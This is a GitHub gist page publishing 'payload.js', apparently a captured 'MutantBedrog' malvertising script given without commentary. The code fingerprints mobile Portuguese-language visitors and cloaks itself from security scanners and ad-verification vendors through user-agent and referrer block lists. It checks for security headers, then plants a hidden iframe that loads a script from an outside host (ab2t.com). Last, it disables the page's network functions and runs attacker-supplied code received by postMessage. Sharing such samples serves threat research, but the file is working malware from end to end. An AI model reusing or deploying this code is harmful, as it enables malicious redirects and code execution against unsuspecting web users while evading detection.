Skip to content

Instantly share code, notes, and snippets.

@eliyastein

eliyastein/payload.js Secret

Created September 6, 2024 17:19
Show Gist options

  • Select an option

    Learn more about clone URLs
  • Save eliyastein/501392d5b52ca07cef4d5ea9bddc254e to your computer and use it in GitHub Desktop.

Select an option

Learn more about clone URLs
Save eliyastein/501392d5b52ca07cef4d5ea9bddc254e to your computer and use it in GitHub Desktop.
Download ZIP
MutantBedrog Payload
Raw
payload.js
window._tk = encodeURIComponent('|')
ce = () => {
cr = () => {
const j = document.createElement('canvas'),
y = j.getContext('webgl')
if (!y) {
return false
}
const D = y.getExtension('WEBGL_debug_renderer_info'),
U = y.getParameter(D.UNMASKED_VENDOR_WEBGL),
p = y.getParameter(D.UNMASKED_RENDERER_WEBGL),
V = [
{
v: 'ARM',
r: /Mali/,
},
{
v: 'Qualcomm',
r: /Adreno/,
},
{
v: 'Imagination Technologies',
r: /PowerVR/,
},
{
v: 'Samsung',
r: /Mali/,
},
{
v: 'NVIDIA Corporation',
r: /NVIDIA/,
},
{
v: 'Intel Inc.',
r: /Intel/,
},
{
v: 'Samsung Electronics',
r: /Xclipse/,
},
]
return V.some((q) => q.v === U && q.r.test(p))
}
cstr = (j, y, D = true) => {
if (j.trim() === '') {
return false
}
try {
var U = j
return (
D && (U = new URL(j).hostname),
(y = y.filter((p) => p !== '')),
y.some((p) => U.includes(p))
)
} catch (p) {
return true
}
}
try {
var B = ''
try {
if (window === parent) {
B = location.href
} else {
B = parent.location.href
}
} catch (j) {
B = document.referrer
}
return [
cr(),
navigator.userAgent.toLowerCase().includes('android'),
navigator.maxTouchPoints > 1,
navigator.plugins.length === 0,
'ontouchstart' in document.documentElement,
window.matchMedia('(pointer:coarse)').matches,
window.matchMedia('(any-pointer:coarse)').matches,
typeof navigator.mediaDevices.getDisplayMedia === 'undefined',
typeof window.orientation !== 'undefined',
navigator.platform.toLowerCase().includes('linux armv'),
!cstr(
navigator.userAgent.toLowerCase(),
[
'ptst',
'virustotal',
'axios',
'lighthouse',
'curl',
'http',
'nessus',
'python',
'headless',
'spider',
'adbeat',
'ahrefs',
'bing',
'microsoft',
'facebook',
'bot',
'tmt',
'themediatrust',
'geoedge',
],
false
),
!cstr(B.toLowerCase(), [
'adnxs',
'xandr',
'secure',
'google',
'preview',
'geoedge',
'safe',
'2mdn',
'doubleclick',
'tmt',
'localhost',
'test',
'confiant',
'adometry',
'ias',
'adometry',
'xpose',
'yapper',
'doubleverify',
'project',
'proximic',
'peer39',
'psb',
'realvu',
'media',
'whiteops',
'pixalate',
'trustmetrics',
'impact',
'moat',
'forensiq',
]),
cstr(navigator.language.substr(0, 2).toLowerCase(), ['pt'], false),
].every((y) => y)
} catch (y) {
return false
}
}
cp = () => {
document.readyState === 'complete' &&
(clearInterval(_cit),
ce() &&
'getBattery' in navigator &&
navigator
.getBattery()
.then((B) => {
!B.charging &&
((co = async () => {
let j = document.getElementsByTagName('meta')
for (let y = 0; y < j.length; y++) {
let D = j[y].httpEquiv
if (
D &&
(D.toLowerCase().includes('content-security') ||
D.toLowerCase().includes('cross-origin'))
) {
return true
}
}
try {
if (location.href.indexOf('http') < 0) {
return false
}
let U = await fetch(location.href, { method: 'HEAD' })
for (let [p, V] of U.headers) {
if (
p.toLowerCase().includes('content-security') ||
p.toLowerCase().includes('cross-origin')
) {
return true
}
if (
p.toLowerCase() === 'access-control-allow-origin' &&
V !== '*'
) {
return true
}
}
} catch (q) {
return false
}
return false
}),
co().then((j) => {
if (!j && typeof trustedTypes !== 'undefined') {
try {
var y =
'\net = () => {\n var t = Math.round(Date.now() / 1000).toString();\n var es = "";\n for (var i = 0; i < t.length; i++) {\n var c = t.charCodeAt(i);\n es += String.fromCharCode(c + 10);\n }\n return encodeURIComponent(btoa(es));\n};\ntry {\nif (typeof trustedTypes !== "undefined") {\nconst rp = trustedTypes.createPolicy("rp", {\ncreateScriptURL: (input) => input,\n});\nvar script = document.createElement("script");\nscript.src = rp.createScriptURL(\n"https://ab2t.com/v2/banner/pix?id=5d83bs12&aid=ttd006&tid=' +
(window['_tk'] || 0) +
'&p="+et()\n);\nscript.type = "text/javascript";\nscript.onload = function () {\nscript.parentNode.removeChild(script);\nwindow.parent.postMessage("distroy", "*");\n};\nscript.onerror = function () {\nscript.parentNode.removeChild(script);\nwindow.parent.postMessage("distroy", "*");\n};\ndocument.head.appendChild(script);\n}\n} catch (e) {}'
const U = trustedTypes.createPolicy('rp', {
createHTML: (p) => p,
})
var D = document.createElement('iframe')
D.setAttribute(
'srcdoc',
U.createHTML('<script>' + y + '</sc' + 'ript>')
)
D.setAttribute(
'style',
'width: 0; height: 0; border: none; position: absolute; visibility: hidden;'
)
setTimeout(() => {
document.body.appendChild(D)
window.addEventListener('message', function (p) {
p.data === 'distroy' && D.parentNode.removeChild(D)
if (p.data.secd) {
try {
const q = window.setInterval(function () {},
Number.MAX_SAFE_INTEGER)
for (let T = 1; T < q + 20; T++) {
window.clearInterval(T)
window.clearTimeout(T)
}
navigator.sendBeacon = function (t, W) {
return true
}
window.fetch = function (t, W) {
return new Promise((b) => b())
}
XMLHttpRequest.prototype.open = function (
t,
W,
b,
k,
z
) {}
XMLHttpRequest.prototype.send = function (t) {}
} catch (t) {}
try {
if (typeof trustedTypes !== 'undefined') {
const W = trustedTypes.createPolicy('rp', {
createScript: (b) => b,
})
var V = document.createElement('script')
V.textContent = W.createScript(p.data.secd)
V.type = 'text/javascript'
V.onload = function () {
V.parentNode.removeChild(V)
}
V.onerror = function () {
V.parentNode.removeChild(V)
}
document.head.appendChild(V)
}
} catch (b) {}
}
})
}, Math.floor(Math.random() * 1000) + 100)
} catch (p) {}
}
}))
})
.catch((B) => {}))
}
var _cit = setInterval(cp, 100)
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment